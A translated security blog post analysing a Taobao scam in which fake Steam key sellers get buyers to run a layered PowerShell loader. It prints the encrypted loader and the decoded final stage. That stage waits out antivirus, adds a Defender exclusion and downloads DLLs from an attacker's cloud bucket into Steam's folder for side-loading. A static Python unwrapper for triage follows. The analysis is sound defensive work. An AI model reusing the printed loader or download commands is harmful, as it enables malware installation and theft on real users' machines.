AI-assisted teardown of the poisoned cheap Steam activation-key scam on Taobao!


网络安全透视镜 (Cybersecurity Lens), 2023-11-13 07:00, posted from Hong Kong, China
 

The following article comes from 星云安全 (Nebula Security), author 十二.

 

Bored and scrolling Bilibili this morning, I came across an uploader's video, and what it showed was genuinely alarming. These black-hearted sellers really are despicable.


The seller baits buyers with a very cheap activation key. After you pay, the code cannot be redeemed through the official channel; instead the seller tells you to run a snippet of code, and only after that does the "redemption" go through!


Being told to run something in PowerShell is already a red flag. First let's work out what that command actually does, so let's ask ChatGPT.


So let's run only the first half of the command and leave off the second half, to see what it returns. (`irm` is the alias of Invoke-RestMethod; on its own it just fetches and displays the response, nothing is executed.)

irm steam.work


What comes back is a chunk of PowerShell. Let's decode its base64 portion.


Decoded:

$regwqbe = New-Object "System.Security.Cryptography.AesManaged"$rhfxkezu = [System.Convert]::FromBase64String("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")$at
vt = [System.Convert]::FromBase64String("hkdA0VhDg/YC4GeQ12rHb4ahi/6KnLO0YA1GbJ13lBU=")$regwqbe.IV = $rhfxkezu[0..15]$regwqbe.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7$regwqbe.Mode = [System.Security.Cryptography.CipherMode]::ECB$regwqbe.KeySize = 128$regwqbe.Key = $atvt$regwqbe.BlockSize = 128$joiphp = New-Object System.IO.MemoryStream(,$regwqbe.CreateDecryptor().TransformFinalBlock($rhfxkezu,16,$rhfxkezu.Length-16))$giaait = New-Object System.IO.MemoryStream$cnuskgam = New-Object System.IO.Compression.GzipStream $joiphp, ([IO.Compression.CompressionMode]::Decompress)$cnuskgam.CopyTo($giaait)$vndjspend = [System.Text.Encoding]::UTF8.GetString($giaait.ToArray())$cnuskgam.Close()$joiphp.Close()$regwqbe.Dispose()Invoke-Expression($vndjspend)

We hand this to ChatGPT again and, sure enough, it is another nesting doll. What this stage does: the short base64 string is the AES key and the long one is the ciphertext. The first 16 bytes of the ciphertext are sliced off as an "IV" (pointless, since ECB mode ignores the IV), the remainder is decrypted with AES in ECB mode with PKCS7 padding, the result is gunzipped, and the resulting text is handed straight to Invoke-Expression. Note that the key decodes to 32 bytes, so the effective cipher is AES-256 despite the KeySize = 128 line that precedes the key assignment.


We change Invoke-Expression($vndjspend) to echo $vndjspend so the decrypted stage is printed instead of executed, save it as a .ps1 file, and run it with PowerShell:


PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\00\Desktop\66.ps1


Yet another nested layer. We keep decoding the same way, layer by layer, until the final stage comes out.


With the code fully unwrapped, let's see what it actually wants to do!

Write-Host -NoNewline "          _____                _____                    _____                    _____         _____          `r" -ForegroundColor:blue
Write-Host -NoNewline "         /\    \              /\    \                  /\    \                  /\    \        /\    \         `r" -ForegroundColor:blue
Write-Host -NoNewline "        /::\    \            /::\    \                /::\    \                /::\    \       /::\____\        `r" -ForegroundColor:blue
Write-Host -NoNewline "       /::::\    \           \:::\    \              /::::\    \              /::::\    \              /::::|   |        `r" -ForegroundColor:blue
Write-Host -NoNewline "      /::::::\    \           \:::\    \            /::::::\    \            /::::::\    \            /:::::|   |        `r" -ForegroundColor:blue
Write-Host -NoNewline "     /:::/\:::\    \           \:::\    \          /:::/\:::\    \          /:::/\:::\    \          /::::::|   |        `r" -ForegroundColor:blue
Write-Host -NoNewline "    /:::/__\:::\    \           \:::\    \        /:::/__\:::\    \        /:::/__\:::\    \        /:::/|::|   |        `r" -ForegroundColor:blue
Write-Host -NoNewline "    \:::\   \:::\    \          /::::\    \      /::::\   \:::\    \      /::::\   \:::\    \      /:::/ |::|   |        `r" -ForegroundColor:blue
Write-Host -NoNewline "  ___\:::\   \:::\    \        /::::::\    \    /::::::\   \:::\    \    /::::::\   \:::\    \    /:::/  |::|___|______  `r" -ForegroundColor:blue
Write-Host -NoNewline " /\   \:::\   \:::\    \      /:::/\:::\    \  /:::/\:::\   \:::\    \  /:::/\:::\   \:::\    \  /:::/   |::::::::\    \ `r" -ForegroundColor:blue
Write-Host -NoNewline "/::\   \:::\   \:::\____\    /:::/  \:::\____\/:::/__\:::\   \:::\____\/:::/  \:::\   \:::\____\/:::/    |:::::::::\____\`r" -ForegroundColor:blue
Write-Host -NoNewline "\:::\   \:::\   \::/    /   /:::/    \::/    /\:::\   \:::\   \::/    /\::/    \:::\  /:::/    /\::/    / ~~~~~/:::/    /`r" -ForegroundColor:blue
Write-Host -NoNewline " \:::\   \:::\   \/____/   /:::/    / \/____/  \:::\   \:::\   \/____/  \/____/ \:::\/:::/    /  \/____/      /:::/    / `r" -ForegroundColor:blue
Write-Host -NoNewline "  \:::\   \:::\    \      /:::/    /            \:::\   \:::\    \               \::::::/    /               /:::/    /  `r" -ForegroundColor:blue
Write-Host -NoNewline "   \:::\   \:::\____\    /:::/    /              \:::\   \:::\____\               \::::/    /               /:::/    /   `r" -ForegroundColor:blue
Write-Host -NoNewline "    \:::\  /:::/    /    \::/    /                \:::\   \::/    /               /:::/    /               /:::/    /    `r" -ForegroundColor:blue
Write-Host -NoNewline "     \:::\/:::/    /      \/____/                  \:::\   \/____/               /:::/    /               /:::/    /     `r" -ForegroundColor:blue
Write-Host -NoNewline "      \::::::/    /                                 \:::\    \                  /:::/    /               /:::/    /      `r" -ForegroundColor:blue
Write-Host -NoNewline "       \::::/    /                                   \:::\____\                /:::/    /               /:::/    /       `r" -ForegroundColor:blue
Write-Host -NoNewline "        \::/    /                                     \::/    /                \::/    /       \::/    /        `r" -ForegroundColor:blue
Write-Host -NoNewline "         \/____/                                       \/____/                  \/____/        \/____/         `r" -ForegroundColor:blue

function Get-RandomString() {
    param(
        [int]$length=10, # [int]
        [char[]]$sourcedata
    )
    for($loop=1; $loop -le $length; $loop++) {
        $TempPassword+=($sourcedata | GET-RANDOM | %{[char]$_})
    }
    return $TempPassword
}

Start-Sleep 1
$tempLog = $env:TEMP+ "\log.txt"
try{
    irm -Uri "https://hz-config.oss-accelerate.aliyuncs.com/help.txt" -OutFile $tempLog
}catch{
    Write-Host "NetWork Result-Error" -ForegroundColor:red
}

function PwStart() {
    try {
        $steamPath = (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Valve\Steam\ActiveProcess" -ErrorAction Stop).'SteamClientDll'
        $steamPath = $steamPath -replace "steamclient.dll","hid.dll"
        if(Get-Process 360Tray* -ErrorAction Stop){
            while(Get-Process 360Tray* -ErrorAction Stop){
                Write-Host (Get-Content $tempLog)[0] -ForegroundColor:Red
                Start-Sleep 1.5
            }
            PwStart
        } elseif(Get-Process 360sd* -ErrorAction Stop) {
            while(Get-Process 360sd* -ErrorAction Stop){
                Write-Host (Get-Content $tempLog)[1] -ForegroundColor:Red
                Start-Sleep 1.5
            }
            PwStart
        } else{
            try{
                Stop-Process -Name steam* -Force -ErrorAction Stop
                Start-Sleep 1
                if(Get-Process steam* -ErrorAction Stop){
                    TASKKILL /F /IM "steam.exe" | Out-Null
                    Start-Sleep 2
                }
                if (Test-Path $steamPath) {
                    Start-Sleep 1
                    del $steamPath
                    if (Test-Path $steamPath) {
                        Remove-Item -Path $steamPath -Force
                        Start-Sleep 1
                    }
                    Start-Sleep 0.5
                }
                $steamPath = $steamPath -replace "hid.dll","version.dll"
                if (Test-Path $steamPath) {
                    Start-Sleep 0.5
                    Remove-Item -Path $steamPath -Force
                    Start-Sleep 0.5
                }
                $steamPath = $steamPath -replace "version.dll","user32.dll"
                if (Test-Path $steamPath) {
                    Start-Sleep 0.5
                    Remove-Item -Path $steamPath -Force
                    Start-Sleep 0.5
                }
                $steamPath = $steamPath -replace "user32.dll","hid.dll"
                Write-Host "ServerStart [OK]" -ForegroundColor:green
                try {
                    Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop
                    Start-Sleep 1
                    # Set-MpPreference -SubmitSamplesConsent 0 -ErrorAction Stop
                } catch { }
                Write-Host "Result[0] [OK]" -ForegroundColor:green
                Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/PSH" -OutFile $steamPath -ErrorAction Stop
                Write-Host "Result[1] [OK]" -ForegroundColor:green
                $strfmt = -join ($env:LOCALAPPDATA,"\Microsoft\Tencent")
                if ((Test-Path $strfmt)) {
                    rmdir -Recurse $strfmt | Out-Null
                    Start-Sleep 1
                    if ((Test-Path $strfmt)) {
                        Remove-Item -Path $strfmt -Force -Recurse | Out-Null
                    }
                }
                $strfmt = -join ($env:LOCALAPPDATA,"\SteamActive")
                if (!(Test-Path $strfmt)) {
                    md $strfmt | Out-Null
                    Start-Sleep 1
                    if (!(Test-Path $strfmt)) {
                        New-Item $strfmt -ItemType directory -Force | Out-Null
                    }
                }
                $strfmt = -join ($env:LOCALAPPDATA,"\SteamActive\hid")
                Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/hid" -OutFile $strfmt -ErrorAction Stop
                Write-Host "Result[2] [OK]" -ForegroundColor:green
                Start-Sleep 0.5
                Start steam://
                Write-Host (Get-Content $tempLog)[3] -ForegroundColor:green
                Start-Sleep 5
                exit
            } catch {
                Write-Host (Get-Content $tempLog)[2] -ForegroundColor:Red
            }
        }
    } catch{
        Write-Host (Get-Content $tempLog)[4] -ForegroundColor:red
    }
}

 


Reading it through: the script does not actually kill 360. As long as 360Tray or 360sd (360 Security Guard) is running it simply loops, printing line 0 or 1 of the help.txt it fetched from the attacker's OSS bucket (presumably instructions telling the victim to switch the AV off), and only proceeds once those processes are gone. It then force-kills Steam, derives the Steam install directory from HKCU\SOFTWARE\Valve\Steam\ActiveProcess\SteamClientDll, removes any existing hid.dll, version.dll and user32.dll there (likely leftovers from earlier variants), adds a Windows Defender exclusion for the hid.dll path, downloads the OSS object PSH into that path, drops a second object into %LOCALAPPDATA%\SteamActive\hid, wipes %LOCALAPPDATA%\Microsoft\Tencent, and relaunches Steam via steam:// so that Steam picks up the planted hid.dll. That is a DLL search-order hijack (side-loading) rather than an injection. The AV wait loop, the Defender exclusion and a download written straight to a DLL path are the behaviours worth hunting for. We pulled the OSS files and submitted them to ThreatBook (微步) for analysis.
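The write-up peels each wrapper by hand and swaps Invoke-Expression for echo so the next stage is printed rather than run. The same job can be done statically, without ever executing attacker code, and the final stage can then be triaged for indicators. The following is an added example written for this edit, not code from the original post or from 星云安全. It assumes the three wrappers seen above (a `-EncodedCommand` base64 of UTF-16LE, a base64 blob fed to GzipStream, and the AesManaged + GzipStream stage), and it guesses which base64 blob is the key by length (the ciphertext is the long one), which holds for the page's sample but is a heuristic. `aes_gzip_stage` replays the page's decryptor and needs the `cryptography` package; the constructed sample only exercises the other two wrappers. The sample final stage is constructed for this example, with the URL, registry key and process names copied from the decoded script above.

```python
"""Static unwrapper and triage for layered PowerShell loaders (added example)."""
import base64
import gzip
import re

# The three wrappers seen in the page's chain.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_RE = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
IEX_RE = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)

# Indicators pulled from a decoded stage.
URL_RE = re.compile(r"https?://[^\s\"')]+")
REG_RE = re.compile(r"Registry::(HK[^\"']+)")
WAIT_RE = re.compile(r"while\s*\(\s*Get-Process\s+(\S+)")
KILL_RE = re.compile(r"Stop-Process\s+-Name\s+(\S+)|TASKKILL\s+/F\s+/IM\s+\"?([^\s\"]+)", re.I)
EXCL_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+(\S+)")
DLL_RE = re.compile(r'"((?:hid|version|user32)\.dll)"')   # names a loader resolves by search order


def aes_gzip_stage(blob: bytes, key: bytes) -> str:
    """Replay of the page's decryptor: skip the 16 dead 'IV' bytes (ECB ignores an IV),
    AES-ECB decrypt, strip PKCS7, gunzip.  Needs `pip install cryptography`.
    A 32-byte key makes this AES-256 whatever KeySize the script claims."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(key), modes.ECB()).decryptor()
    padded = dec.update(blob[16:]) + dec.finalize()
    return gzip.decompress(padded[: -padded[-1]]).decode("utf-8")


def peel_layer(text: str):
    """Return the next stage as text, or None if `text` is not a known wrapper."""
    m = ENC_RE.search(text)
    if m:                                           # powershell -enc <base64 of UTF-16LE>
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    blobs = [base64.b64decode(b) for b in B64_RE.findall(text)]
    if "GzipStream" in text and blobs:
        if blobs[0][:2] == b"\x1f\x8b":             # gzip magic: plain base64+gzip stage
            return gzip.decompress(blobs[0]).decode("utf-8")
        if "AesManaged" in text and len(blobs) == 2:
            blob, key = sorted(blobs, key=len, reverse=True)   # heuristic: ciphertext is the long one
            return aes_gzip_stage(blob, key)
    return None


def unwrap(text: str, max_layers: int = 10) -> list:
    """Peel wrappers statically; nothing is ever executed.  layers[-1] is the innermost."""
    layers = [text]
    while len(layers) <= max_layers:
        nxt = peel_layer(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def triage(stage: str) -> dict:
    """Indicators worth pivoting on.  still_wrapped=True means a layer was not recognised."""
    kills = {a or b for a, b in KILL_RE.findall(stage)}
    return {
        "urls": sorted(set(URL_RE.findall(stage))),
        "registry": sorted(set(REG_RE.findall(stage))),
        "av_wait_loops": sorted(set(WAIT_RE.findall(stage))),
        "killed_processes": sorted(kills),
        "defender_exclusions": sorted(set(EXCL_RE.findall(stage))),
        "sideload_dlls": sorted(set(DLL_RE.findall(stage))),
        "still_wrapped": bool(IEX_RE.search(stage)),
    }


# Constructed sample: a cut-down final stage with the page's behaviours (URL, registry
# key and process names copied from the decoded script), wrapped in the two outer layers.
FINAL_STAGE = r'''$steamPath = (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Valve\Steam\ActiveProcess").'SteamClientDll'
$steamPath = $steamPath -replace "steamclient.dll","hid.dll"
while(Get-Process 360Tray* -ErrorAction SilentlyContinue){ Start-Sleep 1.5 }
Stop-Process -Name steam* -Force
TASKKILL /F /IM "steam.exe" | Out-Null
Add-MpPreference -ExclusionPath $steamPath
Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/PSH" -OutFile $steamPath
Start steam://'''


def build_sample() -> str:
    """Wrap FINAL_STAGE as base64+gzip behind Invoke-Expression, then as -enc UTF-16LE."""
    gz = base64.b64encode(gzip.compress(FINAL_STAGE.encode("utf-8"))).decode()
    stage2 = ('$ms = New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"))\n'
              '$gz = New-Object IO.Compression.GzipStream $ms, ([IO.Compression.CompressionMode]::Decompress)\n'
              'Invoke-Expression((New-Object IO.StreamReader($gz)).ReadToEnd())' % gz)
    enc = base64.b64encode(stage2.encode("utf-16-le")).decode()
    return "powershell -ExecutionPolicy Bypass -enc " + enc


if __name__ == "__main__":
    layers = unwrap(build_sample())
    for i, layer in enumerate(layers):
        print(f"--- layer {i}: {len(layer)} chars, iex={'yes' if IEX_RE.search(layer) else 'no'} ---")
    for k, v in triage(layers[-1]).items():
        print(f"{k:20} {v}")
```

Feed `unwrap()` the text captured from `irm steam.work` on an isolated analysis VM and it returns every stage it recognises; a result whose last layer still has `still_wrapped` set means a wrapper this script does not know about, which is the cue to decode that one by hand as the write-up does.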

The PSH file is flagged as malicious outright: https://s.threatbook.com/report/file/0e346983d60d9eaac363993c09285609af7fa1a461c3fb92659dc7936f68cddd

The HID file comes back fairly clean, but that does not rule it out.

 

posted @ 2023-11-14 11:39 by 达达尼亚2017